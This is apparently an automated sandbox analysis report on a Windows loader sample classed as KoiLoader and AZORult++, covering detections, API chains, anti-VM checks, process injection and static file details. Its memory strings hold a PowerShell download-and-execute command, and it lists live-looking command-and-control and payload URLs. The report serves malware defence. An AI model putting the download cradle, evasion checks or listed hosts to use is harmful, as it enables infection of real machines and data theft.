Edit tour

Windows Analysis Report
tcmeimnnMZ.exe

Overview

General Information

Sample name:	tcmeimnnMZ.exe renamed because original name is a hash value
Original sample name:	b3e62e0daf3abe85e035558fed736e91.exe
Analysis ID:	1528831
MD5:	b3e62e0daf3abe85e035558fed736e91
SHA1:	bfe4ef22d4b4ab14480bc6d71acf677e7f111b29
SHA256:	b09ce5d71929178f5d40479c2c7a4eadd86e4e7f182124702d5fdb0ce393d2ba
Tags:	exeKoiLoaderuser-abuse_ch
Infos:

Detection

AZORult++, KoiLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Detected AZORult++ Trojan

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected KoiLoader

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Contain functionality to detect virtual machines

Contains functionality to compare user and computer (likely to detect sandboxes)

Contains functionality to inject code into remote processes

Found evasive API chain (may stop execution after checking locale)

Found evasive API chain (may stop execution after checking mutex)

Machine Learning detection for sample

Contains capabilities to detect virtual machines

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected potential crypto function

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

Program does not show much activity (idle)

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Classification

Process Tree

System is w10x64

tcmeimnnMZ.exe (PID: 7432 cmdline: "C:\Users\user\Desktop\tcmeimnnMZ.exe" MD5: B3E62E0DAF3ABE85E035558FED736E91)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Koi Loader		No Attribution	https://www.esentire.com/blog/unraveling-not-azorult-but-koi-loader-a-precursor-to-koi-stealer	https://malpedia.caad.fkie.fraunhofer.de/details/win.koiloader

Malware Configuration

Threatname: KoiLoader

{"C2": "http://121.127.33.20/fermentum.php", "Payload url": "https://kionaonline.com/modules/bonslick"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.1723838379.0000000000E41000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_KoiLoader_1	Yara detected KoiLoader	Joe Security
00000000.00000002.1723860556.0000000000EBE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_KoiLoader_1	Yara detected KoiLoader	Joe Security
Process Memory Space: tcmeimnnMZ.exe PID: 7432	JoeSecurity_KoiLoader_1	Yara detected KoiLoader	Joe Security

Unpacked PEs

Source	Rule	Description	Author
0.2.tcmeimnnMZ.exe.ee17f0.2.unpack	JoeSecurity_KoiLoader_1	Yara detected KoiLoader	Joe Security
0.2.tcmeimnnMZ.exe.e40000.1.unpack	JoeSecurity_KoiLoader_1	Yara detected KoiLoader	Joe Security
0.2.tcmeimnnMZ.exe.ee17f0.2.raw.unpack	JoeSecurity_KoiLoader_1	Yara detected KoiLoader	Joe Security

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: tcmeimnnMZ.exe

Avira: detected

Found malware configuration

Source: 00000000.00000002.1723838379.0000000000E41000.00000020.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: KoiLoader {"C2": "http://121.127.33.20/fermentum.php", "Payload url": "https://kionaonline.com/modules/bonslick"}

Multi AV Scanner detection for submitted file

Source: tcmeimnnMZ.exe	ReversingLabs: Detection: 71%
Source: tcmeimnnMZ.exe	Virustotal: Detection: 77%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: tcmeimnnMZ.exe

Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\tcmeimnnMZ.exe	Code function: 0_2_00E48FC0 CryptGenRandom,HeapFree,GetProcessHeap,HeapFree,wsprintfA,GetProcessHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,	0_2_00E48FC0
Source: C:\Users\user\Desktop\tcmeimnnMZ.exe	Code function: 0_2_00E48380 InitializeCriticalSection,GetVolumeInformationW,StringFromGUID2,wsprintfA,CreateMutexW,GetLastError,WSAStartup,CryptAcquireContextA,CryptAcquireContextA,CoInitializeEx,ExpandEnvironmentStringsW,CreateFileW,ExitProcess,	0_2_00E48380
Source: C:\Users\user\Desktop\tcmeimnnMZ.exe	Code function: 0_2_00E48356 Sleep,Sleep,Sleep,InitializeCriticalSection,GetVolumeInformationW,StringFromGUID2,wsprintfA,CreateMutexW,GetLastError,WSAStartup,CryptAcquireContextA,CryptAcquireContextA,CoInitializeEx,ExpandEnvironmentStringsW,CreateFileW,	0_2_00E48356

Source: tcmeimnnMZ.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: tcmeimnnMZ.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\tcmeimnnMZ.exe

Code function: 0_2_00E48660 EnumDisplayDevicesW,EnumDisplayDevicesW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,EnumDisplayDevicesW,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,PathCombineW,GetFileAttributesW,PathCombineW,GetFileAttributesW,StrStrIW,PathCombineW,PathCombineW,PathCombineW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,lstrcmpA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,PathCombineW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,GetProcessHeap,HeapFree,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesExW,GetComputerNameW,GetUserNameW,lstrcmpW,lstrcmpW,StrStrW,lstrcmpW,lstrcmpW,lstrcmpW,GlobalMemoryStatusEx,lstrcmpW,lstrcmpW,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,StrStrIW,GetModuleFileNameW,StrStrIW,

0_2_00E48660

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://121.127.33.20/fermentum.php

Source: C:\Users\user\Desktop\tcmeimnnMZ.exe

Code function: 0_2_00E466E0 HeapFree,ObtainUserAgentString,MultiByteToWideChar,MultiByteToWideChar,GetProcessHeap,HeapAlloc,MultiByteToWideChar,InternetOpenW,InternetSetOptionW,InternetConnectW,HttpOpenRequestW,InternetQueryOptionW,InternetSetOptionW,HttpSendRequestW,InternetQueryDataAvailable,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,HeapFree,GetProcessHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

0_2_00E466E0

Source: tcmeimnnMZ.exe	String found in binary or memory: http://121.127.33.20/fermentum.php
Source: tcmeimnnMZ.exe, 00000000.00000002.1723838379.0000000000E41000.00000020.00001000.00020000.00000000.sdmp, tcmeimnnMZ.exe, 00000000.00000002.1723860556.0000000000EBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://121.127.33.20/fermentum.php%temp%
Source: tcmeimnnMZ.exe	String found in binary or memory: https://kionaonline.com/modules/bonslick
Source: tcmeimnnMZ.exe, 00000000.00000002.1723838379.0000000000E41000.00000020.00001000.00020000.00000000.sdmp, tcmeimnnMZ.exe, 00000000.00000002.1723860556.0000000000EBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://kionaonline.com/modules/bonslick/c

E-Banking Fraud

Detected AZORult++ Trojan

Source: C:\Users\user\Desktop\tcmeimnnMZ.exe

Code function: 0_2_00E48E60 EntryPoint,GetUserDefaultLangID,ExitProcess,

0_2_00E48E60

Source: C:\Users\user\Desktop\tcmeimnnMZ.exe	Code function: 0_2_00E45EB0 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTempPathW,wnsprintfW,wnsprintfW,PathCombineW,CreateFileW,WriteFile,WriteFile,SetEndOfFile,SetFilePointer,wnsprintfW,RtlInitUnicodeString,RtlInitUnicodeString,RtlInitUnicodeString,GetCurrentProcess,SetFilePointer,WriteFile,FlushFileBuffers,SetEndOfFile,NtQueryInformationProcess,NtClose,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,NtClose,NtClose,NtClose,NtClose,CloseHandle,		0_2_00E45EB0
Source: C:\Users\user\Desktop\tcmeimnnMZ.exe	Code function: 0_2_00E45B30 GetModuleHandleW,GetProcAddress,CreateProcessW,NtQueryInformationProcess,ReadProcessMemory,GetThreadContext,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,ReadProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,CloseHandle,		0_2_00E45B30

Source: C:\Users\user\Desktop\tcmeimnnMZ.exe	Code function: 0_2_0062E87D	0_2_0062E87D
Source: C:\Users\user\Desktop\tcmeimnnMZ.exe	Code function: 0_2_00E424E0	0_2_00E424E0
Source: C:\Users\user\Desktop\tcmeimnnMZ.exe	Code function: 0_2_00E478A0	0_2_00E478A0
Source: C:\Users\user\Desktop\tcmeimnnMZ.exe	Code function: 0_2_00E47480	0_2_00E47480
Source: C:\Users\user\Desktop\tcmeimnnMZ.exe	Code function: 0_2_00E442A0	0_2_00E442A0
Source: C:\Users\user\Desktop\tcmeimnnMZ.exe	Code function: 0_2_00E446A0	0_2_00E446A0

Source: C:\Users\user\Desktop\tcmeimnnMZ.exe	Code function: String function: 00623040 appears 46 times
Source: C:\Users\user\Desktop\tcmeimnnMZ.exe	Code function: String function: 00624480 appears 33 times

Source: tcmeimnnMZ.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.bank.troj.evad.winEXE@1/0@0/0

Source: C:\Users\user\Desktop\tcmeimnnMZ.exe

Code function: 0_2_00E46250 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,CloseHandle,AdjustTokenPrivileges,CloseHandle,

0_2_00E46250

Source: C:\Users\user\Desktop\tcmeimnnMZ.exe

Code function: 0_2_00E46C00 ExpandEnvironmentStringsW,VariantInit,CoCreateInstance,SysAllocString,SysAllocString,SysFreeString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,VariantInit,SysAllocString,SysAllocString,SysFreeString,VariantClear,

0_2_00E46C00

Source: C:\Users\user\Desktop\tcmeimnnMZ.exe

Command line argument: jhl46745fghb

0_2_00622F40

Source: tcmeimnnMZ.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\tcmeimnnMZ.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: tcmeimnnMZ.exe	ReversingLabs: Detection: 71%
Source: tcmeimnnMZ.exe	Virustotal: Detection: 77%

Source: C:\Users\user\Desktop\tcmeimnnMZ.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\tcmeimnnMZ.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\tcmeimnnMZ.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\tcmeimnnMZ.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\tcmeimnnMZ.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\tcmeimnnMZ.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\tcmeimnnMZ.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\tcmeimnnMZ.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\tcmeimnnMZ.exe	Section loaded: sspicli.dll	Jump to behavior

Source: tcmeimnnMZ.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: tcmeimnnMZ.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: tcmeimnnMZ.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: tcmeimnnMZ.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: tcmeimnnMZ.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: tcmeimnnMZ.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: tcmeimnnMZ.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: tcmeimnnMZ.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source: tcmeimnnMZ.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: tcmeimnnMZ.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: tcmeimnnMZ.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: tcmeimnnMZ.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: tcmeimnnMZ.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Yara detected KoiLoader

Source: Yara match	File source: 0.2.tcmeimnnMZ.exe.ee17f0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.tcmeimnnMZ.exe.e40000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.tcmeimnnMZ.exe.ee17f0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1723838379.0000000000E41000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1723860556.0000000000EBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: tcmeimnnMZ.exe PID: 7432, type: MEMORYSTR

Source: C:\Users\user\Desktop\tcmeimnnMZ.exe

Code function: 0_2_00621300 GetModuleHandleA,VirtualAlloc,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualFree,VirtualProtect,

0_2_00621300

Malware Analysis System Evasion

Contain functionality to detect virtual machines

Source: C:\Users\user\Desktop\tcmeimnnMZ.exe

Code function: VMWare %systemroot%\System32\VBoxService.exe %systemroot%\System32\VBoxService.exe %systemroot%\System32\VBoxTray.exe

0_2_00E48660

Contains functionality to compare user and computer (likely to detect sandboxes)

Source: C:\Users\user\Desktop\tcmeimnnMZ.exe

Code function: EnumDisplayDevicesW,EnumDisplayDevicesW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,EnumDisplayDevicesW,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,PathCombineW,GetFileAttributesW,PathCombineW,GetFileAttributesW,StrStrIW,PathCombineW,PathCombineW,PathCombineW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,lstrcmpA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,PathCombineW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,GetProcessHeap,HeapFree,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesExW,GetComputerNameW,GetUserNameW,lstrcmpW,lstrcmpW,StrStrW,lstrcmpW,lstrcmpW,lstrcmpW,GlobalMemoryStatusEx,lstrcmpW,lstrcmpW,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,StrStrIW,GetModuleFileNameW,StrStrIW,

0_2_00E48660

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\Desktop\tcmeimnnMZ.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

graph_0-10476

Found evasive API chain (may stop execution after checking mutex)

Source: C:\Users\user\Desktop\tcmeimnnMZ.exe

Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess

graph_0-10640

Source: C:\Users\user\Desktop\tcmeimnnMZ.exe

File opened / queried: C:\Windows\System32\VBoxService.exe

Jump to behavior

Source: C:\Users\user\Desktop\tcmeimnnMZ.exe

API coverage: 9.9 %

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\tcmeimnnMZ.exe

0_2_00E48660

Source: tcmeimnnMZ.exe	Binary or memory string: Hyper-V
Source: tcmeimnnMZ.exe, 00000000.00000002.1723860556.0000000000EBE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: POST%s\|%s\|VoYGkc5RStart%d\|%sINITWindowsPowerShell\v1.0\powershell.exe -enc %S%ComSpec% /c %Skernel32Wow64DisableWow64FsRedirectionWow64RevertWow64FsRedirectionShellExecuteWshell32openReleaseSeShutdownPrivilege%Shttp://121.127.33.20/fermentum.php%temp%\%paths%%SYSTEMROOT%\Microsoft.NET\Framework\v4.0.30319\csc.exe%SYSTEMROOT%\Microsoft.NET\Framework\v2.0.50727\csc.exesd2.ps1sd4.ps1https://kionaonline.com/modules/bonslick/c "powershell -command IEX(IWR -UseBasicParsing '%s/%s')"Hyper-VVMWareParallels Display AdapterRed Hat QXL controller%systemroot%\System32\VBoxService.exe%systemroot%\System32\VBoxTray.exe?
Source: tcmeimnnMZ.exe	Binary or memory string: VMWare
Source: tcmeimnnMZ.exe	Binary or memory string: %systemroot%\System32\VBoxService.exe
Source: tcmeimnnMZ.exe	Binary or memory string: %systemroot%\System32\VBoxTray.exe

Source: C:\Users\user\Desktop\tcmeimnnMZ.exe	API call chain: ExitProcess graph end node			graph_0-10579
Source: C:\Users\user\Desktop\tcmeimnnMZ.exe	API call chain: ExitProcess graph end node			graph_0-10759

Source: C:\Users\user\Desktop\tcmeimnnMZ.exe

Code function: 0_2_0062695B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_0062695B

Source: C:\Users\user\Desktop\tcmeimnnMZ.exe

Code function: 0_2_00621300 GetModuleHandleA,VirtualAlloc,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualFree,VirtualProtect,

0_2_00621300

Source: C:\Users\user\Desktop\tcmeimnnMZ.exe	Code function: 0_2_00621710 mov ecx, dword ptr fs:[00000030h]	0_2_00621710
Source: C:\Users\user\Desktop\tcmeimnnMZ.exe	Code function: 0_2_006275A2 mov eax, dword ptr fs:[00000030h]	0_2_006275A2
Source: C:\Users\user\Desktop\tcmeimnnMZ.exe	Code function: 0_2_00629763 mov eax, dword ptr fs:[00000030h]	0_2_00629763
Source: C:\Users\user\Desktop\tcmeimnnMZ.exe	Code function: 0_2_00E45EB0 mov eax, dword ptr fs:[00000030h]	0_2_00E45EB0
Source: C:\Users\user\Desktop\tcmeimnnMZ.exe	Code function: 0_2_00E47690 mov eax, dword ptr fs:[00000030h]	0_2_00E47690

Source: C:\Users\user\Desktop\tcmeimnnMZ.exe

Code function: 0_2_0062A845 GetProcessHeap,

0_2_0062A845

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\tcmeimnnMZ.exe	Code function: 0_2_00623D4E SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00623D4E
Source: C:\Users\user\Desktop\tcmeimnnMZ.exe	Code function: 0_2_0062695B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0062695B
Source: C:\Users\user\Desktop\tcmeimnnMZ.exe	Code function: 0_2_0062421C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0062421C
Source: C:\Users\user\Desktop\tcmeimnnMZ.exe	Code function: 0_2_006243AF SetUnhandledExceptionFilter,	0_2_006243AF

HIPS / PFW / Operating System Protection Evasion

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\tcmeimnnMZ.exe

Code function: 0_2_00E45B30 GetModuleHandleW,GetProcAddress,CreateProcessW,NtQueryInformationProcess,ReadProcessMemory,GetThreadContext,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,ReadProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,CloseHandle,

0_2_00E45B30

Source: C:\Users\user\Desktop\tcmeimnnMZ.exe

Code function: 0_2_006244C5 cpuid

0_2_006244C5

Source: C:\Users\user\Desktop\tcmeimnnMZ.exe

Code function: 0_2_00624103 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00624103

Source: C:\Users\user\Desktop\tcmeimnnMZ.exe

0_2_00E48660

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	1 Access Token Manipulation	21 Virtualization/Sandbox Evasion	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	2 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	21 Native API	Boot or Logon Initialization Scripts	1 Process Injection	1 Access Token Manipulation	LSASS Memory	231 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Process Injection	Security Account Manager	21 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	1 Account Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Obfuscated Files or Information	LSA Secrets	1 System Owner/User Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	112 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
tcmeimnnMZ.exe	71%	ReversingLabs	Win32.Trojan.AZORult
tcmeimnnMZ.exe	78%	Virustotal		Browse
tcmeimnnMZ.exe	100%	Avira	TR/Kryptik.ujyuz
tcmeimnnMZ.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Link
https://kionaonline.com/modules/bonslick	0%	Virustotal	Browse
https://kionaonline.com/modules/bonslick/c	0%	Virustotal	Browse
http://121.127.33.20/fermentum.php%temp%	0%	Virustotal	Browse
http://121.127.33.20/fermentum.php	1%	Virustotal	Browse

Domains and IPs

Contacted Domains

⊘No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://121.127.33.20/fermentum.php	true	1%, Virustotal, Browse	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://kionaonline.com/modules/bonslick	tcmeimnnMZ.exe	true	0%, Virustotal, Browse	unknown
http://121.127.33.20/fermentum.php%temp%	tcmeimnnMZ.exe, 00000000.00000002.1723838379.0000000000E41000.00000020.00001000.00020000.00000000.sdmp, tcmeimnnMZ.exe, 00000000.00000002.1723860556.0000000000EBE000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://kionaonline.com/modules/bonslick/c	tcmeimnnMZ.exe, 00000000.00000002.1723838379.0000000000E41000.00000020.00001000.00020000.00000000.sdmp, tcmeimnnMZ.exe, 00000000.00000002.1723860556.0000000000EBE000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown

World Map of Contacted IPs

⊘No contacted IP infos

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1528831
Start date and time:	2024-10-08 10:31:25 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 1m 55s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	1
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	tcmeimnnMZ.exe renamed because original name is a hash value
Original Sample Name:	b3e62e0daf3abe85e035558fed736e91.exe
Detection:	MAL
Classification:	mal100.bank.troj.evad.winEXE@1/0@0/0
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 96% Number of executed functions: 5 Number of non-executed functions: 67
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

⊘No context

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

⊘No created / dropped files found

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.877116751370657
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	tcmeimnnMZ.exe
File size:	182'272 bytes
MD5:	b3e62e0daf3abe85e035558fed736e91
SHA1:	bfe4ef22d4b4ab14480bc6d71acf677e7f111b29
SHA256:	b09ce5d71929178f5d40479c2c7a4eadd86e4e7f182124702d5fdb0ce393d2ba
SHA512:	8ce78b34ab254e4eb102d3a5428a027aeb05dc8dceeefb30b26ff8e4adcf06a14a425e313ddf122df400657d3ea1d2e1ba5789c4169ac3cb94d2a83a20a365f0
SSDEEP:	3072:zCmlA+2TGMF85+bkRG32foUP9GmPe97Uo+J4vmvfR7E4l2G2K28pmLSNZ:2mlV4h8JG3QUzWL44l2xJLSNZ
TLSH:	02048D44B0CAA436D027AA33566456525B3CFE20DFD3CFCB1794885B4FAD0D1AA31F6A
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........`J...$R..$R..$R.j'S..$R.j!SE.$R.j S..$RHz S..$RHz'S..$RHz!S..$R.j%S..$R..%R..$REz-S..$REz.R..$R...R..$REz&S..$RRich..$R.......

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x403d44
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x65D59C0C [Wed Feb 21 06:45:32 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
